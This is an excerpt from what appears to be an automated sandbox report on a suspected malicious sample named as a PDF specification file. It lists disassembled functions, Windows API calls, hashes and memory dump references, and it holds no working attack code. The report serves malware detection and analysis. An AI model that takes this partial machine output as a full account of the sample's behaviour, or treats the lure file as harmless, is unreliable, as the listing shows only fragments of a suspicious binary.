                                      • Opcode ID: a8491b2e3639f8c842cfd7d87abd0aecb32d001855f3d6d606758bda39241b09
                                      • Instruction ID: 4d877a0a0139c94584bfccc4c6e577a3bc3764c092f4248051f68fcfb33c1fef
                                      • Opcode Fuzzy Hash: a8491b2e3639f8c842cfd7d87abd0aecb32d001855f3d6d606758bda39241b09
                                      • Instruction Fuzzy Hash: D1E03970C00909AFCB12DBA4DA449ECFBBCAB48705F148092E602F2960DB705A84DF22
                                      Function 003BAC59 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: %.3d$WIN_XPe
                                      • API String ID: 481472006-2409531811
                                      • Opcode ID: a50b67f14435d20545fb30f495ea7534014c6536e26bbd3a72e56a4354ebf78e
                                      • Instruction ID: 715cbc91e8517f9b3117b0010a82d7b047295103f7ebe42fc1e6187896a30e9f
                                      • Opcode Fuzzy Hash: a50b67f14435d20545fb30f495ea7534014c6536e26bbd3a72e56a4354ebf78e
                                      • Instruction Fuzzy Hash: 0BE01271804E1CEBCB139750CD05DFAB7BCA704745F5444E2FA06E1C14E7359B84AB22
                                      Function 003A8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A86A2
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003A86B5
                                        • Part of subcall function 00387A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: 8f04d1d87f9db10745301e602af0025562a04ac60f6ff79eb4925479d880a2c9
                                      • Instruction ID: 70816d907cf2c38a67fa651dcc2f08a81d29116e26b6bd7fbdc1c26cac72292e
                                      • Opcode Fuzzy Hash: 8f04d1d87f9db10745301e602af0025562a04ac60f6ff79eb4925479d880a2c9
                                      • Instruction Fuzzy Hash: E8D01271385318B7E26A77709C4BFD6BA1C9B45B11F110825F749EA2D0C9F4F950C754
                                      Function 003A86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A86E2
                                      • PostMessageW.USER32(00000000), ref: 003A86E9
                                        • Part of subcall function 00387A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: 4c5bfe24dd13b932ec3aedb2dc320138522e8d0bf64d9c384de85e3fbb266005
                                      • Instruction ID: 69ad23def51579e4cc26caeee245d4c4a1c2737a57b0a98f2c0cd1088cb930af
                                      • Opcode Fuzzy Hash: 4c5bfe24dd13b932ec3aedb2dc320138522e8d0bf64d9c384de85e3fbb266005
                                      • Instruction Fuzzy Hash: 24D0C9713853186BE26A67709C4BFC6BA189B49B11F510825B749EA2D0C9A4F950C758
                                      Function 003725C3 Relevance: 5.1, APIs: 4, Instructions: 128COMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00372658
                                      • GetLastError.KERNEL32 ref: 00372666
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003726B9
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003726F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1717984340-0
                                      • Opcode ID: 0e21cce3341a4a87c14c171f5b385dad24437464fac71de9415aec856cf1465a
                                      • Instruction ID: c486db56d71d8822a45e0ec660f338611891528e18d74f52f042939593cba76e
                                      • Opcode Fuzzy Hash: 0e21cce3341a4a87c14c171f5b385dad24437464fac71de9415aec856cf1465a
                                      • Instruction Fuzzy Hash: 4241D7306042899FDB379F24CD84BAB7BA8BF01310F268156F459AB1A1D774DD00C761